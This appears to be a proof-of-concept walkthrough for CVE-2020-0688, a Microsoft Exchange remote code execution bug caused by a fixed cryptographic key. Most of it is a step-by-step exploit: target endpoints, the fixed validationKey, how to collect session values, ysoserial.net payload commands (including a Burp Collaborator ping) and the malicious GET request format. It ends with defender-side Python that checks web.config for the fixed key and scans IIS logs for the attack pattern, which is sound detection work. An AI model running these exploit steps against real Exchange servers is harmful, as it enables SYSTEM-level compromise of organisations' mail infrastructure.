<b>[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Instead of having randomly generated keys on a per-installation basis, all installations of Microsoft Exchange Server ship with the same `validationKey` and `decryptionKey` values in web.config. Because the keys are known, an <i>authenticated</i> attacker can trick the server into deserializing maliciously crafted ViewState data. With the help of [YSoSerial.net](https://github.com/pwntester/ysoserial.net), an attacker can execute arbitrary .NET code on the server in the context of the Exchange Control Panel (ECP) web application, which runs with SYSTEM privileges.
<b>Step 1:</b> Visit one of the following endpoints to reach the authentication page
- [x] http(s)://exchangeserver/owa
- [x] http(s)://exchangeserver/owa/auth.owa
- [x] http(s)://exchangeserver/owa/auth/logon.aspx
- [x] http(s)://exchangeserver/ecp
- [x] http(s)://exchangeserver/ecp/default.aspx
<b>Step 2:</b> Log in with any valid credentials (the account's privilege level does not matter) and take the `ASP.NET_SessionId` value from the HTTP response Cookie and the `__VIEWSTATEGENERATOR` value from the HTTP response body. For example:
- [x] <b>ASP.NET_SessionId:</b> 05ae4b41-51e1-4c3a-9241-6b87b169d663
- [x] <b>__VIEWSTATEGENERATOR:</b> B97B4E27
- [x] <b>validationKey (Fixed):</b> CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
- [x] <b>validationalg (Fixed):</b> SHA1
<b>Step 3:</b> To generate the payload (to verify the vulnerability), use [YSoSerial.net](https://github.com/pwntester/ysoserial.net).
Note that if you have access to the target Exchange server, you can use the following payload, which creates a text file named `PoC.txt` in the `C:\` directory:
```powershell
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/PoC.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug --islegacy
```
However, if you cannot access the server, the following payload, which pings a Burp Collaborator host, may work better:
```powershell
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping xxxxxxxx..burpcollaborator.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug --islegacy
```
<b>Step 4:</b> After step 3, you will have a URL-encoded ViewState payload. Send a GET request to the endpoint below in the following format:
```
http(s)://exchangeserver/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState_Payload>
```
The original blog post is available [here](https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys).
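Added defender-side checks (example code written for this page, not part of the PoC or of ysoserial.net): one verifies whether an Exchange web.config still carries the fixed `validationKey` quoted above, the other scans IIS W3C log lines for the Step 4 pattern, ViewState supplied in the query string of a GET to `/ecp/default.aspx`. The sample web.config and log lines are constructed; the `decryptionKey` value is a placeholder.

```python
import xml.etree.ElementTree as ET

# Fixed validationKey quoted in this write-up; a patched server has a random one.
FIXED_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"


def machine_key_is_fixed(web_config_xml: str) -> bool:
    """True if the <machineKey> in this web.config still uses the fixed key."""
    root = ET.fromstring(web_config_xml)
    return any(
        mk.get("validationKey", "").upper() == FIXED_VALIDATION_KEY
        for mk in root.iter("machineKey")
    )


def find_viewstate_get_requests(log_lines):
    """Scan IIS W3C log lines for GETs to /ecp/default.aspx that carry
    __VIEWSTATE and __VIEWSTATEGENERATOR in the query string (Step 4 above).
    Returns (client ip, username, query) per hit; expects a #Fields header."""
    fields, hits = None, []
    for line in log_lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        query = rec.get("cs-uri-query", "").lower()
        if (rec.get("cs-method") == "GET"
                and rec.get("cs-uri-stem", "").lower() == "/ecp/default.aspx"
                and "__viewstate=" in query
                and "__viewstategenerator=" in query):
            hits.append((rec["c-ip"], rec["cs-username"], rec["cs-uri-query"]))
    return hits


# Constructed sample web.config fragment (decryptionKey is a placeholder).
SAMPLE_WEB_CONFIG = """<configuration><system.web>
<machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
            decryptionKey="PLACEHOLDER" validation="SHA1"/>
</system.web></configuration>"""

# Constructed IIS log sample: a normal ECP request, then one with ViewState in the query.
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status",
    "2020-02-26 10:00:01 10.0.0.5 GET /ecp/default.aspx - 443 CORP\\alice 10.0.0.20 200",
    "2020-02-26 10:00:07 10.0.0.5 GET /ecp/default.aspx "
    "__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=CONSTRUCTEDBLOB 443 CORP\\alice 10.0.0.20 500",
]
```

Alerting on the log hits is only a starting point: the request is authenticated, so the username in the hit tells you which account's credentials were used.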